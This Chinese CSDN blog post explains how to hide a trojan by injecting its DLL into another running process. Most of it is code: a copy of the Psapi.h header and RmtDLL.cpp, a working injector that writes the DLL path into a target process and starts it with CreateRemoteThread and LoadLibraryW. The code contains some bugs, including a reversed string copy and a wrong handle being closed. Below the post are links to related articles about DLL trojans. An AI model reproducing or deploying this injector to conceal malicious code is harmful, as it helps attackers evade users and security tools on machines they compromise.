DLL木马程序

最新推荐文章于 2019-07-07 10:03:04 发布
最新推荐文章于 2019-07-07 10:03:04 发布
阅读量2.1k 收藏 15
点赞数
文章标签: dll null file struct path callback
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/takeie/article/details/2610198
版权
href="file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/01/clip_filelist.xml" rel="File-List" />           DLL 木马 LL32 的方法进行进程隐藏是简易的,非常容易被识破的,进程列表中出现多个 Rundll32.exe 容易引起用户的怀疑,故我们要采取远程注入的方式实现进程的隐藏。可以用远程线程技术启动木马 DLL ,也可以事先将一段代码复制到远程的内存空间,然后通过远程线程启动这段代码。无论是采用哪种方式,都是让木马的核心代码运行于别的进程的内存空间,这样不仅能很好的隐藏自己,也能更好的保护自己。此时的木马,不仅欺骗,进入计算机,甚至进入了用户进程的内部。 Psapi.h 
#ifndef _PSAPI_H_

#define _PSAPI_H_



#if _MSC_VER > 1000

#pragma once

#endif



#ifdef __cplusplus

extern "C" {

#endif



BOOL

WINAPI

EnumProcesses(

    DWORD * lpidProcess,

    DWORD   cb,

    DWORD * cbNeeded

    );



BOOL

WINAPI

EnumProcessModules(

    HANDLE hProcess,

    HMODULE *lphModule,

    DWORD cb,

    LPDWORD lpcbNeeded

    );



DWORD

WINAPI

GetModuleBaseNameA(

    HANDLE hProcess,

    HMODULE hModule,

    LPSTR lpBaseName,

    DWORD nSize

    );



DWORD

WINAPI

GetModuleBaseNameW(

    HANDLE hProcess,

    HMODULE hModule,

    LPWSTR lpBaseName,

    DWORD nSize

    );



#ifdef UNICODE

#define GetModuleBaseName  GetModuleBaseNameW

#else

#define GetModuleBaseName  GetModuleBaseNameA

#endif // !UNICODE





DWORD

WINAPI

GetModuleFileNameExA(

    HANDLE hProcess,

    HMODULE hModule,

    LPSTR lpFilename,

    DWORD nSize

    );



DWORD

WINAPI

GetModuleFileNameExW(

    HANDLE hProcess,

    HMODULE hModule,

    LPWSTR lpFilename,

    DWORD nSize

    );



#ifdef UNICODE

#define GetModuleFileNameEx  GetModuleFileNameExW

#else

#define GetModuleFileNameEx  GetModuleFileNameExA

#endif // !UNICODE





typedef struct _MODULEINFO {

    LPVOID lpBaseOfDll;

    DWORD SizeOfImage;

    LPVOID EntryPoint;

} MODULEINFO, *LPMODULEINFO;





BOOL

WINAPI

GetModuleInformation(

    HANDLE hProcess,

    HMODULE hModule,

    LPMODULEINFO lpmodinfo,

    DWORD cb

    );





BOOL

WINAPI

EmptyWorkingSet(

    HANDLE hProcess

    );





BOOL

WINAPI

QueryWorkingSet(

    HANDLE hProcess,

    PVOID pv,

    DWORD cb

    );



BOOL

WINAPI

InitializeProcessForWsWatch(

    HANDLE hProcess

    );





typedef struct _PSAPI_WS_WATCH_INFORMATION {

    LPVOID FaultingPc;

    LPVOID FaultingVa;

} PSAPI_WS_WATCH_INFORMATION, *PPSAPI_WS_WATCH_INFORMATION;



BOOL

WINAPI

GetWsChanges(

    HANDLE hProcess,

    PPSAPI_WS_WATCH_INFORMATION lpWatchInfo,

    DWORD cb

    );



DWORD

WINAPI

GetMappedFileNameW(

    HANDLE hProcess,

    LPVOID lpv,

    LPWSTR lpFilename,

    DWORD nSize

    );



DWORD

WINAPI

GetMappedFileNameA(

    HANDLE hProcess,

    LPVOID lpv,

    LPSTR lpFilename,

    DWORD nSize

    );



#ifdef UNICODE

#define GetMappedFileName  GetMappedFileNameW

#else

#define GetMappedFileName  GetMappedFileNameA

#endif // !UNICODE



BOOL

WINAPI

EnumDeviceDrivers(

    LPVOID *lpImageBase,

    DWORD cb,

    LPDWORD lpcbNeeded

    );





DWORD

WINAPI

GetDeviceDriverBaseNameA(

    LPVOID ImageBase,

    LPSTR lpBaseName,

    DWORD nSize

    );



DWORD

WINAPI

GetDeviceDriverBaseNameW(

    LPVOID ImageBase,

    LPWSTR lpBaseName,

    DWORD nSize

    );



#ifdef UNICODE

#define GetDeviceDriverBaseName  GetDeviceDriverBaseNameW

#else

#define GetDeviceDriverBaseName  GetDeviceDriverBaseNameA

#endif // !UNICODE





DWORD

WINAPI

GetDeviceDriverFileNameA(

    LPVOID ImageBase,

    LPSTR lpFilename,

    DWORD nSize

    );



DWORD

WINAPI

GetDeviceDriverFileNameW(

    LPVOID ImageBase,

    LPWSTR lpFilename,

    DWORD nSize

    );



#ifdef UNICODE

#define GetDeviceDriverFileName  GetDeviceDriverFileNameW

#else

#define GetDeviceDriverFileName  GetDeviceDriverFileNameA

#endif // !UNICODE



// Structure for GetProcessMemoryInfo()



typedef struct _PROCESS_MEMORY_COUNTERS {

    DWORD cb;

    DWORD PageFaultCount;

    SIZE_T PeakWorkingSetSize;

    SIZE_T WorkingSetSize;

    SIZE_T QuotaPeakPagedPoolUsage;

    SIZE_T QuotaPagedPoolUsage;

    SIZE_T QuotaPeakNonPagedPoolUsage;

    SIZE_T QuotaNonPagedPoolUsage;

    SIZE_T PagefileUsage;

    SIZE_T PeakPagefileUsage;

} PROCESS_MEMORY_COUNTERS;

typedef PROCESS_MEMORY_COUNTERS *PPROCESS_MEMORY_COUNTERS;



#if (_WIN32_WINNT >= 0x0501)



typedef struct _PROCESS_MEMORY_COUNTERS_EX {

    DWORD cb;

    DWORD PageFaultCount;

    SIZE_T PeakWorkingSetSize;

    SIZE_T WorkingSetSize;

    SIZE_T QuotaPeakPagedPoolUsage;

    SIZE_T QuotaPagedPoolUsage;

    SIZE_T QuotaPeakNonPagedPoolUsage;

    SIZE_T QuotaNonPagedPoolUsage;

    SIZE_T PagefileUsage;

    SIZE_T PeakPagefileUsage;

    SIZE_T PrivateUsage;

} PROCESS_MEMORY_COUNTERS_EX;

typedef PROCESS_MEMORY_COUNTERS_EX *PPROCESS_MEMORY_COUNTERS_EX;



#endif



BOOL

WINAPI

GetProcessMemoryInfo(

    HANDLE Process,

    PPROCESS_MEMORY_COUNTERS ppsmemCounters,

    DWORD cb

    );



typedef struct _PERFORMACE_INFORMATION {

    DWORD cb;

    SIZE_T CommitTotal;

    SIZE_T CommitLimit;

    SIZE_T CommitPeak;

    SIZE_T PhysicalTotal;

    SIZE_T PhysicalAvailable;

    SIZE_T SystemCache;

    SIZE_T KernelTotal;

    SIZE_T KernelPaged;

    SIZE_T KernelNonpaged;

    SIZE_T PageSize;

    DWORD HandleCount;

    DWORD ProcessCount;

    DWORD ThreadCount;

} PERFORMACE_INFORMATION, *PPERFORMACE_INFORMATION;



BOOL

WINAPI

GetPerformanceInfo (

    PPERFORMACE_INFORMATION pPerformanceInformation,

    DWORD cb

    );



typedef struct _ENUM_PAGE_FILE_INFORMATION {

    DWORD cb;

    DWORD Reserved;

    SIZE_T TotalSize;

    SIZE_T TotalInUse;

    SIZE_T PeakUsage;

} ENUM_PAGE_FILE_INFORMATION, *PENUM_PAGE_FILE_INFORMATION;



typedef BOOL (*PENUM_PAGE_FILE_CALLBACKW) (LPVOID pContext, PENUM_PAGE_FILE_INFORMATION pPageFileInfo, LPCWSTR lpFilename);



typedef BOOL (*PENUM_PAGE_FILE_CALLBACKA) (LPVOID pContext, PENUM_PAGE_FILE_INFORMATION pPageFileInfo, LPCSTR lpFilename);



BOOL

WINAPI

EnumPageFilesW (

    PENUM_PAGE_FILE_CALLBACKW pCallBackRoutine,

    LPVOID pContext

    );



BOOL

WINAPI

EnumPageFilesA (

    PENUM_PAGE_FILE_CALLBACKA pCallBackRoutine,

    LPVOID pContext

    );



#ifdef UNICODE

#define PENUM_PAGE_FILE_CALLBACK PENUM_PAGE_FILE_CALLBACKW

#define EnumPageFiles EnumPageFilesW

#else

#define PENUM_PAGE_FILE_CALLBACK PENUM_PAGE_FILE_CALLBACKA

#define EnumPageFiles EnumPageFilesA

#endif // !UNICODE



DWORD

WINAPI

GetProcessImageFileNameA(

    HANDLE hProcess,

    LPSTR lpImageFileName,

    DWORD nSize

    );



DWORD

WINAPI

GetProcessImageFileNameW(

    HANDLE hProcess,

    LPWSTR lpImageFileName,

    DWORD nSize

    );



#ifdef UNICODE

#define GetProcessImageFileName  GetProcessImageFileNameW

#else

#define GetProcessImageFileName  GetProcessImageFileNameA

#endif // !UNICODE



#ifdef __cplusplus

}

#endif



#endif
RmtDLL.cpp 
#include<windows.h>

#include<stdlib.h>

#include<stdio.h>

#include "Psapi.h"



DWORD ProcessToPID(char *);

void CheckError(int,int,char *);

void usage(char *);



PDWORD pdwThreadId;

HANDLE hRemoteThread,hRemoteProcess;

DWORD fdwCreate,dwStackSize,dwRemoteProcessId;

PWSTR pszLibFileRemote=NULL;



void main(int argc,char **argv)

{

	int iReturnCode;

	char lpDllFullPathName[MAX_PATH];

	WCHAR pszLibFileName[MAX_PATH]={0};

	

	if(argc!=3)

		usage("parametes number incorrect!");

	else

	{

		printf("%sldskglisagi");

		if(isdigit(*argv[1]))

			dwRemoteProcessId=atoi(argv[1]);

		else

			dwRemoteProcessId = ProcessToPID(argv[1]);

		if(strstr(argv[2],"://")!=NULL)

			strncpy(argv[2],lpDllFullPathName,MAX_PATH);

		else

		{

			iReturnCode=GetCurrentDirectory(MAX_PATH,lpDllFullPathName);

			CheckError(iReturnCode,0,"GetCurrentDirectory");

			strcat(lpDllFullPathName,"//");

			strcat(lpDllFullPathName,argv[2]);

			printf("Convert DLL filename to FullPathName:/n/n%s/n/n",lpDllFullPathName);

		}

		

		iReturnCode=(int)_lopen(lpDllFullPathName,OF_READ);

		CheckError(iReturnCode,HFILE_ERROR,"DLL File not Exist");

		iReturnCode=MultiByteToWideChar(CP_ACP,MB_ERR_INVALID_CHARS,lpDllFullPathName,strlen(lpDllFullPathName),pszLibFileName,MAX_PATH);

		CheckError(iReturnCode,0,"MultByteToWideChar");

		wprintf(L"Will inject %s",pszLibFileName);

		printf("intoprocess:%sPID=%d/n",argv[1],dwRemoteProcessId);

	}

	hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);

	CheckError((int) hRemoteProcess, NULL,"Remote Process not Exist or Access Denide!");

	int cb=(1+lstrlenW(pszLibFileName)) *sizeof(WCHAR);

	pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,MEM_COMMIT,PAGE_READWRITE);

	CheckError((int)pszLibFileRemote,NULL,"VirtualAllocEx");

	iReturnCode=WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(PVOID)pszLibFileName,cb,NULL);

	CheckError(iReturnCode,false,"WriteProcessMemory");

	PTHREAD_START_ROUTINE pfnStartAddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")),"LoadLibraryW");

	CheckError((int)pfnStartAddr,NULL,"GetProcAddress");

	hRemoteThread=CreateRemoteThread(hRemoteProcess,NULL,0,pfnStartAddr,pszLibFileRemote,0,NULL);

	CheckError((int)pfnStartAddr,NULL,"Create Remote Thread");

	WaitForSingleObject(hRemoteThread,INFINITE);

	if(pszLibFileRemote!=NULL)

		VirtualFreeEx(hRemoteProcess,pszLibFileRemote,0,MEM_RELEASE);

	if(hRemoteThread!=NULL)

		CloseHandle(hRemoteThread);

	if(hRemoteProcess!=NULL)

		CloseHandle(hRemoteThread);

}



DWORD ProcessToPID(char *InputProcessName)

{

	DWORD aProcess[1024],cbNeeded,cProcesses;

	unsigned int i;

	HANDLE hProcess;

	HMODULE hMod;

	char szProcessName[MAX_PATH] = "UnkonwnProcess";

	

	//计算目前有多少进程,aProcesses[]用来存放有效的进程PIDs

	if(!EnumProcesses(aProcess,sizeof(aProcess),&cbNeeded))

		return 0;

	cProcesses = cbNeeded / sizeof(DWORD);

	//按有效的PID遍历所有的进程

	for(i=0; i<cProcesses; i++)

	{

		//打开特定PID的进程

		hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |	PROCESS_VM_READ,FALSE, aProcess[i]);

		//获得特定PID的进程名

		if( hProcess)

		{

			if(EnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded))

			{

				GetModuleBaseName(hProcess, hMod,

					szProcessName, sizeof(szProcessName));

				if(!_stricmp(szProcessName,InputProcessName))

				{

					CloseHandle( hProcess );

					return aProcess[i];

				}

			}

		}//end of if( hProcess )

	}//end of for

	//没有找到相应的进程名,返回0

	CloseHandle( hProcess );

	return 0;

}//end of ProcessToPID



//错误处理函数CheckError()

//如果iReturnCode等于iErrorCode,则输出pErrorMsg并推出

void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)

{

	if(iReturnCode == iErrorCode)

	{

		printf("%s Error:%d/n/n", pErrorMsg, GetLastError());

		//清场处理

		if(pszLibFileRemote != NULL)

			VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);

		if(hRemoteThread != NULL)

			CloseHandle(hRemoteThread);

		if(hRemoteProcess != NULL)

			CloseHandle(hRemoteProcess);

		exit(0);

	}

}//end of CheckError()



//使用方法说明函数usage()

void usage(char * pErrorMsg)

{

	printf("%s/n/n",pErrorMsg);

	printf("/t/tRemote Process DLL by liangshuai/n");

	printf("/tThis program can inject a DLL into remote process/n");

	printf("Email:/n");

	printf("/tshuai52@126.com/n");

	printf("USAGE:/n");

	printf("/tRmtDLL.exe PID[|ProcessName] DLLFullPathName/n");

	printf("Example:/n");

	printf("/tRmtDLL.exe 1024 C://WINDOWS//System32//MyDLL.dll/n");

	printf("/tRmtDLL.exe Explorer.exe C://MyDLL.dll/n");

	exit(0);

}
takeie
关注
远控木马分析(实习生)
heikezhishi的博客
08-19 911
病毒来源:朋友服务器发现此木马 当时为了提样本搞了很久,一直找恢复文件,对提取样本有研究的朋友还请指导指导。 文件名:vister.exe MD5:30866adc2976704bca0f051b5474a1ee 此处创建了一个进程 申明了一个2800大小的Space.buffer 并将地址mov到5123EA08 导入win32 api创建了文件,继续走。 Loadlibrary加载了msvcrt.dll,获取memcpy的函数地址。 ...
【VFB】DLL(VFB教程2-8)
yfvb2010的专栏
02-26 733
此处为VisualFreeBasic编程教程(从零开始学或VB进阶)的子章节部分,全部目录点链接。写DLL点编译DLL,就可以,产生出了DLLDLL是写好的模块给别的软件调用你DLL里的函数。被EXE加载与卸载此函数,在VFB工程【资源】里的【特殊函数】里,并不是你自己写的函数。Function FF_WINMAIN( ByVal hInstance As HINSTANCE, _ ...
VC++动态链接库编程之DLL木马
深之JohnChen的专栏
03-24 2872
VC++动态链接库编程之DLL木马来源: 天极网DLL在程序编制中可作出巨大贡献,它提供了具共性代码的复用能力。但是,正如一门高深的武学,若被掌握在正义之侠的手上,便可助其仗义江湖;但若被掌握在邪恶之徒的手上,则必然在江湖上掀起腥风血雨。DLL正是一种这样的武学。DLL一旦染上了魔性,就不再是正常的DLL程序,而是DLL木马,一种恶贯满盈的病毒,令特洛伊一夜之间国破家亡。 DLL木马的
DLL木马揭秘
张宏双的专栏
12-15 566
导读:   DLL木马揭秘   作者:[HBU]小金   相信经常玩木马的朋友们都会知道一些木马的特性,也会有自己最喜爱的木马,不过,很多朋友依然不知道近年兴起的“DLL木马”为何物。什么是“DLL木马”呢?它与一般的木马有什么不同?   一、从DLL技术说起   要了解DLL木马,就必须知道这个“DLL”是什么意思,所以,让我们追溯到几年前,DOS系统大行其道的日子里。在那时候,写程序是
 DLL木马的原理
修养生息,以得佳境
04-22 2109
 DLL木马的原理  DLL木马的实现原理是编程者在DLL中包含木马程序代码,随后在目标主机中选择特定目标进程,以某种方式强行指定该进程调用包含木马程序DLL,最终达到侵袭目标系统的目的。  正是DLL程序自身的特点决定了以这种形式加载木马不仅可行,而且具有良好的隐藏性:  (1)DLL程序被映射到宿主进程的地址空间中,它能够共享宿主进程的资源,并根据宿主进程在目标主机的级别非法访问相应的系统资
DLL木马
adaidiy的博客
03-31 2275
DLL木马线程注入木马也算是个不太新的方式了,但是在当时一度成为了恐慌.因为在进程中隐藏,而所注入的进程又是系统关键进程,无法终止.至于其他的木马神马神马吧,都是浮云. 木马运行关键是隐藏,神不知鬼不觉才是王道.要隐藏,先要隐藏进程,Windows操作系统中程序以进程的方式运行,大多数操作系统也是如此.任务管理器就可以看到当前运行的进程,所以有人HOOK相关枚举进程的函数,让任务管理
DLL木马进程大揭秘
12-20
- 恶意软件下载器:下载并执行其他DLL木马或恶意程序。 - 感染正常文件:通过修改合法文件,使其在打开时加载恶意DLL。 - 社交工程:通过电子邮件、网络共享等途径诱骗用户下载和执行。 5. 防范措施: - 安全...
巧用WM_CREATE消息隐藏DLL木马VC源代码
03-15
木马程序,尤其是DLL木马,通常设计为在目标系统上秘密运行,以实现非法功能,如窃取信息或控制计算机。隐藏DLL木马的目的是防止安全软件检测到它的存在。 利用WM_CREATE消息隐藏DLL木马的常见策略是延迟加载。在...
DLL木马进程内幕大揭密
01-08
当正常程序尝试加载DLL木马时,它不仅会执行正常DLL的功能,还会暗中执行木马代码,可能包括但不限于信息窃取、远程控制、文件篡改等恶意行为。这种机制使得DLL木马能够悄无声息地潜伏于系统中,直到触发条件被满足...
DLL木马与SPI木马:隐藏在系统中的网络威胁
由于DLL文件不单独产生进程,而是挂载在调用它的程序进程中,这使得DLL木马更难以被安全软件检测到,从而增加了其隐蔽性。 Windows系统自身大量依赖DLL文件,如kernel32.dll、user32.dll和gdi32.dll等,它们提供了...
【VC源码】根据窗口句柄获得EXE的全路径
02-01
因为是需要在注入后的DLL中获取DLL的全路径,在DLL中使用GetCurrentDirectory得到的是注入后的进程的路径而不是DLL的路径,转而求其次,刚好找到有根据窗口句柄找进程路径的资料,于是将注入器EXE的句柄传给DLL,然后在DLL中调用下面的函数从而获得该路径。
DLL木马神秘面纱
木兰当户
04-17 1089
  在这个万“马”奔腾的时代,网络上充斥着各种各样的木马,不过随着杀毒技术的进步和 大家防毒意识的提高,传统木马已渐渐失去市场,而DLL木马则“与时俱进”以其强大的生命力,继续网络中“为非作歹”。因DLL木马的启动方式比较特别, 它不象传统的木马,启动时会“傻傻”地在进程列表中暴露自己,而且还可以通过插入系统进程运行自己,具有很强的隐蔽性。本文就和大家一起来揭开DLL木马 的神秘面纱。  一、
DLL文件与木马
zxj2018的专栏
08-25 1225
一、从DLL技术说起 要了解DLL木马,就必须知道这个“DLL”是什么意思,所以,让我们追溯到几年前,DOS系统大行其道的日子里。在那时候,写程序是一件繁琐的事情,因为每个程序的代码都是独立的,有时候为了实现一个功能,就要为此写很多代码,后来随着编程技术发展,程序员们把很多
DLL 木马揭秘
CSDN1332531529的博客
03-28 241
相信经常玩木马的朋友们都会知道一些木马的特性,也会有自己最喜爱的木马,不过,很多朋友依然不知道近年兴起的“DLL木马”为何物。什么是“DLL木马”呢?它与一般的木马有什么不同? 一、从DLL技术说起 要了解DLL木马, 就必须知道这个“DLL”是什么意思,所以,让我们追溯到几年前,DOS系统大行其道的日子里。在那时候,写程序是一件繁琐的事情,因为每个程序的代码都 是独立的,有时候...
DLL木马的写法
weixu_2008的专栏
09-25 842
原文转自:http://www.3800hk.com/news/w45/124211.html木马运行关键是隐藏,神不知鬼不觉才是王道.要隐藏,先要隐藏进程,Windows操作系统中程序以进程的方式运行,大多数操作系统也是如此.任务管理器就可以看到当前运行的进程,所以有人HOOK相关枚举进程的函数,让任务管理器不显示木马进程,也有人把自己的木马注册成服务运行,"任务管理器"不显示服务的.这
DLL木马的编写要点与思路
维c银翘片
07-04 987
//线程注入木马也算是个不太新的方式了,但是在当时一度成为了恐慌.因为在进程中隐藏,而所注入的进程又是系统关键进程,无法终止.至于其他的木马神马神马吧,都是浮云. //       木马运行关键是隐藏,神不知鬼不觉才是王道.要隐藏,先要隐藏进程,Windows操作系统中程序以进程的方式运行,大多数操作系统也是如此.任务管理器就可以看到当前运行的进程,所以有人HOOK相关枚举进程的函数,让任务管理
小编带你一起揭开DLL木马的神秘面纱(转)
cuankuangzhong6373的博客
07-07 593
在这个万“马”奔腾的时代,网络上充斥着各种各样的木马,不过随着杀毒技术的进步和大家防毒意识的提高,传统木马已渐渐失去市场,而DLL木马则“与时俱进”以其强大的生命力,继续网络中“为非作歹”。因DLL木马的启动方式比较特别,它不象...
通过文件句柄取得到文件名(二)
Coder in Tokyo
03-25 3037
从文件句柄获得文件名方法二, 这个是用GetMappedFileName()函数,局限是只能取得可以文件映射(File Mapping)的文件句柄。参考 MSDN Obtaining a File Name From a File Handle.前一篇通过文件句柄取得到文件名 // reference to "Obtaining a File Name From a File Ha
【转】DLL木马程序
bbo123的专栏
04-08 971
<br />http://blog.csdn.net/takeie/archive/2008/07/04/2610198.aspx<br /><br /> DLL木马LL32的方法进行进程隐藏是简易的,非常容易被识破的,进程列表中出现多个Rundll32.exe容易引起用户的怀疑,故我们要采取远程注入的方式实现进程的隐藏。可以用远程线程技术启动木马DLL,也可以事先将一段代码复制到远程的内存空间,然后通过远程线程启动这段代码。无论是采用哪种方式,都是让木马的核心代码运行于别的进程的内存空间,这样不仅能很好
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值